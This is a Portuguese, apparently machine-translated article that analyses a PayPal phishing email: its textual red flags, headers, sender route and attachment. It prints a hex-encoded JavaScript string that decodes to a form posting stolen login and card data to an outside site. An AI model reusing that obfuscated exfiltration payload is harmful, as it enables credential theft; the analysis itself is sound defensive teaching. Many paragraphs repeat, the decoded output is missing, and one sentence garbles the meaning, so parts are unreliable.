Segurança online: quebrando a anatomia de um e-mail de phishing

Índice:

Segurança online: quebrando a anatomia de um e-mail de phishing
Segurança online: quebrando a anatomia de um e-mail de phishing

Vídeo: Segurança online: quebrando a anatomia de um e-mail de phishing

Vídeo: Segurança online: quebrando a anatomia de um e-mail de phishing
Vídeo: Boot pela rede, o que é? Para que serve? - YouTube 2024, Abril
Anonim
No mundo de hoje, onde as informações de todos estão on-line, o phishing é um dos ataques on-line mais populares e devastadores, pois você sempre pode limpar um vírus, mas se seus dados bancários forem roubados, você está com problemas. Aqui está uma análise de um desses ataques que recebemos.
No mundo de hoje, onde as informações de todos estão on-line, o phishing é um dos ataques on-line mais populares e devastadores, pois você sempre pode limpar um vírus, mas se seus dados bancários forem roubados, você está com problemas. Aqui está uma análise de um desses ataques que recebemos.

Não pense que são apenas os detalhes bancários que são importantes: afinal, se alguém obtiver controle sobre o login da sua conta, ele não apenas saberá as informações contidas nessa conta, mas as probabilidades são de que as mesmas informações de login possam ser usadas em vários outros. contas. E se eles comprometerem sua conta de e-mail, eles poderão redefinir todas as outras senhas.

Portanto, além de manter senhas fortes e variadas, você precisa estar sempre atento a e-mails falsos mascarados como reais. Embora a maioria das tentativas de phishing seja amadora, algumas são bastante convincentes, por isso é importante entender como reconhecê-las no nível da superfície e como elas funcionam sob o capô.

Imagem por asirap

Examinando o que está à vista

Nosso e-mail de exemplo, como a maioria das tentativas de phishing, o "notifica" de atividade em sua conta do PayPal, o que, em circunstâncias normais, seria alarmante. Portanto, a ação é verificar / restaurar sua conta enviando praticamente todas as informações pessoais que você puder imaginar. Novamente, isso é bem estereotipado.

Embora haja exceções, praticamente todos os e-mails de phishing e scam são carregados com bandeiras vermelhas diretamente na mensagem. Mesmo que o texto seja convincente, normalmente você pode encontrar muitos erros espalhados pelo corpo da mensagem que indicam que a mensagem não é legítima.

O corpo da mensagem

À primeira vista, esse é um dos melhores e-mails de phishing que já vi. Não há erros ortográficos ou gramaticais e o palavreado é lido de acordo com o que você poderia esperar. No entanto, existem algumas bandeiras vermelhas que você pode ver quando examina o conteúdo um pouco mais de perto.
À primeira vista, esse é um dos melhores e-mails de phishing que já vi. Não há erros ortográficos ou gramaticais e o palavreado é lido de acordo com o que você poderia esperar. No entanto, existem algumas bandeiras vermelhas que você pode ver quando examina o conteúdo um pouco mais de perto.
  • “Paypal” - O caso correto é “PayPal” (capital P). Você pode ver as duas variações usadas na mensagem. As empresas são muito deliberadas com suas marcas, então é duvidoso que algo assim passasse pelo processo de revisão.
  • “Permitir ActiveX” - Quantas vezes você já viu um negócio legítimo na Web do tamanho do Paypal usar um componente proprietário que funciona apenas em um único navegador, especialmente quando eles suportam vários navegadores? Claro, em algum lugar lá fora, alguma empresa faz isso, mas isso é uma bandeira vermelha.
  • "Com segurança". - Observe como essa palavra não se alinha na margem com o restante do texto do parágrafo. Mesmo se eu esticar a janela um pouco mais, ela não se enrola ou espaço corretamente.
  • "Paypal!" - O espaço antes do ponto de exclamação parece estranho. Só mais um capricho que eu tenho certeza que não estaria em um email legítimo.
  • “PayPal - Formulário de Atualização de Conta.pdf.htm” - Por que o Paypal anexaria um “PDF” especialmente quando eles poderiam apenas vincular a uma página em seu site? Além disso, por que eles tentariam disfarçar um arquivo HTML como PDF? Esta é a maior bandeira vermelha de todos eles.

O cabeçalho da mensagem

Quando você dá uma olhada no cabeçalho da mensagem, aparecem mais algumas bandeiras vermelhas:
Quando você dá uma olhada no cabeçalho da mensagem, aparecem mais algumas bandeiras vermelhas:
  • O endereço do remetente é [email protected].
  • O endereço para está ausente. Não excluí isso, simplesmente não faz parte do cabeçalho da mensagem padrão. Normalmente, uma empresa que tem seu nome irá personalizar o e-mail para você.

O anexo

Quando abro o anexo, você pode ver imediatamente que o layout não está correto, pois está faltando informações de estilo. Novamente, por que o PayPal enviaria por e-mail um formulário em HTML quando ele poderia simplesmente fornecer um link para o site dele?

Nota: Usamos o visualizador de anexos HTML do Gmail para isso, mas recomendamos que você NÃO ABRIR anexos de golpistas. Nunca. Sempre. Eles geralmente contêm exploits que instalam trojans no seu PC para roubar as informações da sua conta.

Rolando um pouco mais, você pode ver que este formulário solicita não apenas as informações de login do PayPal, mas também informações bancárias e de cartão de crédito. Algumas das imagens estão quebradas.
Rolando um pouco mais, você pode ver que este formulário solicita não apenas as informações de login do PayPal, mas também informações bancárias e de cartão de crédito. Algumas das imagens estão quebradas.
É óbvio que esta tentativa de phishing está indo atrás de tudo com um só golpe.
É óbvio que esta tentativa de phishing está indo atrás de tudo com um só golpe.

A divisão técnica

Embora deva ser bastante claro, com base no que está à vista que se trata de uma tentativa de phishing, vamos agora analisar a composição técnica do email e ver o que podemos encontrar.

Informações do Anexo

A primeira coisa a observar é a fonte HTML do formulário de anexo, que é o que envia os dados para o site falso.

Ao visualizar rapidamente a fonte, todos os links parecem válidos, pois apontam para “paypal.com” ou “paypalobjects.com”, ambos legítimos.

Agora vamos dar uma olhada em algumas informações básicas da página que o Firefox reúne na página.
Agora vamos dar uma olhada em algumas informações básicas da página que o Firefox reúne na página.
Como você pode ver, alguns dos gráficos são extraídos dos domínios “blessedtobe.com”, “goodhealthpharmacy.com” e “picuupload.de”, em vez dos legítimos domínios do PayPal.
Como você pode ver, alguns dos gráficos são extraídos dos domínios “blessedtobe.com”, “goodhealthpharmacy.com” e “picuupload.de”, em vez dos legítimos domínios do PayPal.
Image
Image

Informações dos cabeçalhos de email

Em seguida, vamos dar uma olhada nos cabeçalhos das mensagens de e-mail brutos. O Gmail disponibiliza isso por meio da opção de menu Mostrar original na mensagem.

Observando as informações de cabeçalho da mensagem original, você pode ver que essa mensagem foi composta usando o Outlook Express 6. Duvido que o PayPal tenha alguém na equipe que envie cada uma dessas mensagens manualmente por meio de um cliente de email desatualizado.
Observando as informações de cabeçalho da mensagem original, você pode ver que essa mensagem foi composta usando o Outlook Express 6. Duvido que o PayPal tenha alguém na equipe que envie cada uma dessas mensagens manualmente por meio de um cliente de email desatualizado.
Agora, olhando as informações de roteamento, podemos ver o endereço IP do remetente e do servidor de e-mail de retransmissão.
Agora, olhando as informações de roteamento, podemos ver o endereço IP do remetente e do servidor de e-mail de retransmissão.
O endereço IP do "Usuário" é o remetente original. Fazendo uma pesquisa rápida nas informações de IP, podemos ver o IP de envio na Alemanha.
O endereço IP do "Usuário" é o remetente original. Fazendo uma pesquisa rápida nas informações de IP, podemos ver o IP de envio na Alemanha.
E quando olhamos para o servidor de correio de retransmissão (mail.itak.at), endereço IP, podemos ver que este é um ISP baseado na Áustria. Eu duvido que o PayPal direcione seus e-mails diretamente através de um ISP com base na Áustria, quando eles têm um farm de servidores massivo que poderia facilmente lidar com essa tarefa.
E quando olhamos para o servidor de correio de retransmissão (mail.itak.at), endereço IP, podemos ver que este é um ISP baseado na Áustria. Eu duvido que o PayPal direcione seus e-mails diretamente através de um ISP com base na Áustria, quando eles têm um farm de servidores massivo que poderia facilmente lidar com essa tarefa.
Image
Image

Onde os dados vão?

Portanto, determinamos claramente que esse é um e-mail de phishing e coletamos algumas informações sobre o local de origem da mensagem, mas e para onde seus dados são enviados?

Para ver isso, primeiro temos que salvar o anexo HTM da nossa área de trabalho e abrir em um editor de texto. Percorrendo-o, tudo parece estar em ordem, exceto quando chegamos a um bloco de JavaScript suspeito.

Quebrando a fonte completa do último bloco de Javascript, vemos:
Quebrando a fonte completa do último bloco de Javascript, vemos:

Toda vez que você vê uma grande quantidade confusa de letras e números aparentemente aleatórios inseridos em um bloco Javascript, geralmente é algo suspeito. Olhando para o código, a variável “x” é ajustada para esta grande string e então decodificada na variável “y”. O resultado final da variável "y" é então gravado no documento como HTML.

Como a string grande é composta de números de 0 a 9 e as letras a-f, é mais provável que seja codificada por meio de uma simples conversão ASCII para Hex:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Traduz para:

Não é uma coincidência que isso decida em uma tag de formulário HTML válida que envie os resultados para o PayPal, mas para um site não autorizado.

Além disso, quando você visualizar o código-fonte HTML do formulário, verá que essa tag de formulário não está visível porque é gerada dinamicamente por meio do Javascript. Essa é uma maneira inteligente de ocultar o que o HTML está realmente fazendo se alguém simplesmente visualizasse a origem gerada do anexo (como fizemos anteriormente), em vez de abrir o anexo diretamente em um editor de texto.

Executando uma rápida whois no site ofensivo, podemos ver este é um domínio hospedado em um host popular, 1and1.
Executando uma rápida whois no site ofensivo, podemos ver este é um domínio hospedado em um host popular, 1and1.
O que se destaca é que o domínio usa um nome legível (em oposição a algo como “dfh3sjhskjhw.net”) e o domínio está registrado há 4 anos. Por causa disso, acredito que esse domínio foi sequestrado e usado como um peão nessa tentativa de phishing.
O que se destaca é que o domínio usa um nome legível (em oposição a algo como “dfh3sjhskjhw.net”) e o domínio está registrado há 4 anos. Por causa disso, acredito que esse domínio foi sequestrado e usado como um peão nessa tentativa de phishing.

O cinismo é uma boa defesa

Quando se trata de ficar seguro online, nunca é demais ter um pouco de cinismo.

Embora eu tenha certeza de que há mais sinais vermelhos no e-mail de exemplo, o que apontamos acima são indicadores que observamos após alguns minutos de exame. Hipoteticamente, se o nível de superfície do e-mail imitasse sua contraparte legítima em 100%, a análise técnica ainda revelaria sua verdadeira natureza. É por isso que é importante poder examinar o que você pode ou não ver.

Recomendado:

Como corrigir o Photoshop quebrando a chave de escape no Windows

Como corrigir o Photoshop quebrando a chave de escape no Windows

O Photoshop o incomoda, quebrando a chave de escape em outros programas? Aqui está um script AutoHotkey que permite executar o Photoshop e ainda usar a tecla de escape como de costume em outros programas.

O Relatório de Segurança Cibernética da Symantec destaca os riscos e as previsões de segurança para 2013

O Relatório de Segurança Cibernética da Symantec destaca os riscos e as previsões de segurança para 2013

A Symantec, empresa americana de software de segurança, destacou alguns riscos potenciais em seu relatório de segurança cibernética.

Segurança de Computadores, Privacidade de Dados, Segurança Online da Microsoft

Segurança de Computadores, Privacidade de Dados, Segurança Online da Microsoft

Em Cidadania Digital em Ação, a Microsoft lançou documentos, folhetos e dicas para estudantes, pais, educadores, políticos e ONGs.

Anatomia de um fanboy e o culto do Mac

Anatomia de um fanboy e o culto do Mac

Nenhum produto no planeta desfruta da devoção de um computador Macintosh. Famicamente possessivo e dedicado às suas máquinas, muitos fãs de Mac comem, dormem e respiram Macintosh.

O que é phishing e como identificar ataques de phishing

O que é phishing e como identificar ataques de phishing

Esta postagem aumentará sua percepção de phishing, pois informa como evitar ataques de phishing e manter-se seguro on-line. Tipos e características dos ataques de phishing também discutidos.